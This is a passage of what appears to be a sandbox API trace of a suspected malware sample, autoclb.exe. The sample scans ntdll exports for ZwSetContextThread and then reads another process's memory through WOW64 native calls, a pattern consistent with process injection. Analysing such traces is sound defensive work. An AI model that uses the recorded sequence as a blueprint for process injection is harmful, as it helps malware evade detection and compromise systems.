lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0206.808] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwSetContextThread") returned -1 [0206.809] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwSetContextThread") returned -1 [0206.810] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD4Final", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD4Init", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD4Update", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD5Final", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD5Init", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="MD5Update", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwSetContextThread") returned -1 [0206.811] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtClose", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0206.812] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwSetContextThread") returned -1 [0206.813] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwSetContextThread") returned -1 [0206.813] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.820] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.820] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.820] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.820] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0206.821] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.821] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.821] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.821] StrRChrA (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0206.821] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0206.821] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0206.821] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0206.821] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0206.821] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0206.821] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0206.821] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0206.821] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0206.821] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.821] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2720000 [0206.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, 